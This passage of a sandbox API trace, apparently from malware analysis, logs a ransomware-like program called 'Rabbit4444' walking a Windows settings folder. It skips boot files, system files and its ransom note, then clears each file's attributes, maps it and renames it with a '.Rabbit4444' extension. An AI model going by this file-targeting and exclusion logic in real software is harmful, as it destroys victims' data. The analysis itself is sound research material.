(lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.188] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpString2="boot") returned -1 [0057.188] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.188] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.189] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms") returned="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms" [0057.189] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.189] lstrlenW (lpString="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms") returned 54 [0057.189] lstrlenW (lpString="Rabbit4444") returned 10 [0057.189] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.189] lstrlenW (lpString=".dll") returned 4 [0057.189] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.189] lstrlenW (lpString=".lnk") returned 4 [0057.189] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.189] lstrlenW (lpString=".ini") returned 4 [0057.189] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.189] lstrlenW (lpString=".sys") returned 4 [0057.189] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.189] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Email.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_email.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.190] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.190] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14850034845) returned 1 [0057.190] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1213) returned 1 [0057.190] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.190] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.190] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0057.192] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0057.192] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.192] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.192] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.192] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.192] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.193] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14850349211) returned 1 [0057.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.193] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.194] CloseHandle (hObject=0x298) returned 1 [0057.194] CloseHandle (hObject=0x278) returned 1 [0057.194] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Email.settingcontent-ms.Rabbit4444") returned 182 [0057.194] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Email.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_email.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Email.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_email.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.195] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e6238a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x24e6238a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", cAlternateFileName="AA3906~1.SET")) returned 1 [0057.195] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.195] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.195] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.195] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpString2=".") returned 1 [0057.195] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpString2="..") returned 1 [0057.195] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpString2="windows") returned -1 [0057.195] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.195] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.195] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpString2="boot") returned -1 [0057.195] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.195] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.195] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms") returned="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms" [0057.195] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.195] lstrlenW (lpString="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms") returned 52 [0057.195] lstrlenW (lpString="Rabbit4444") returned 10 [0057.195] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.195] lstrlenW (lpString=".dll") returned 4 [0057.195] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.195] lstrlenW (lpString=".lnk") returned 4 [0057.195] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.196] lstrlenW (lpString=".ini") returned 4 [0057.196] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.196] lstrlenW (lpString=".sys") returned 4 [0057.196] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.196] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Map.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_map.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.196] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.196] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14850669287) returned 1 [0057.196] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1203) returned 1 [0057.196] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.196] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.196] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0057.197] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0057.198] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.198] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.198] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.198] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.198] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.198] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.198] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.198] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.198] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14850924419) returned 1 [0057.199] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.199] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.199] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.199] CloseHandle (hObject=0x298) returned 1 [0057.199] CloseHandle (hObject=0x278) returned 1 [0057.199] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Map.settingcontent-ms.Rabbit4444") returned 180 [0057.199] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Map.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_map.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Map.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_map.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.200] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251a978d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x251a978d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", cAlternateFileName="AA1CA4~1.SET")) returned 1 [0057.200] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.200] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.200] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.200] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpString2=".") returned 1 [0057.200] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpString2="..") returned 1 [0057.200] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpString2="windows") returned -1 [0057.200] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.200] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.200] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpString2="boot") returned -1 [0057.200] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.200] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.200] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms") returned="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms" [0057.200] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.200] lstrlenW (lpString="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms") returned 55 [0057.200] lstrlenW (lpString="Rabbit4444") returned 10 [0057.201] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.201] lstrlenW (lpString=".dll") returned 4 [0057.201] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.201] lstrlenW (lpString=".lnk") returned 4 [0057.201] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.201] lstrlenW (lpString=".ini") returned 4 [0057.201] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.201] lstrlenW (lpString=".sys") returned 4 [0057.201] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.201] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_photos.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.201] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.201] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14851184469) returned 1 [0057.201] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1218) returned 1 [0057.201] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.201] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0057.201] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0057.203] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0057.203] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.203] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.203] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.203] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0057.204] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.204] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0057.204] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.204] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.204] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14851469937) returned 1 [0057.204] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.204] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0057.204] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.204] CloseHandle (hObject=0x298) returned 1 [0057.204] CloseHandle (hObject=0x278) returned 1 [0057.204] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms.Rabbit4444") returned 183 [0057.204] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_photos.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_photos.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.205] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25268357, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x25268357, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", cAlternateFileName="AA2D48~1.SET")) returned 1 [0057.205] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.205] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.205] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.205] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpString2=".") returned 1 [0057.205] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpString2="..") returned 1 [0057.205] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpString2="windows") returned -1 [0057.205] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.205] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.205] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpString2="boot") returned -1 [0057.205] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.205] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.205] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms") returned="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms" [0057.205] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.206] lstrlenW (lpString="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms") returned 54 [0057.206] lstrlenW (lpString="Rabbit4444") returned 10 [0057.206] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.206] lstrlenW (lpString=".dll") returned 4 [0057.206] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.206] lstrlenW (lpString=".lnk") returned 4 [0057.206] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.206] lstrlenW (lpString=".ini") returned 4 [0057.206] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.206] lstrlenW (lpString=".sys") returned 4 [0057.206] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.206] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Video.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_video.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.206] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.206] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14851702361) returned 1 [0057.206] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1213) returned 1 [0057.206] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.206] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0057.206] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0057.209] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0057.210] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.210] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.211] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.211] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.211] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14852168730) returned 1 [0057.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0057.211] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.211] CloseHandle (hObject=0x298) returned 1 [0057.211] CloseHandle (hObject=0x278) returned 1 [0057.211] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Video.settingcontent-ms.Rabbit4444") returned 182 [0057.211] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Video.settingcontent-ms" (normalized: 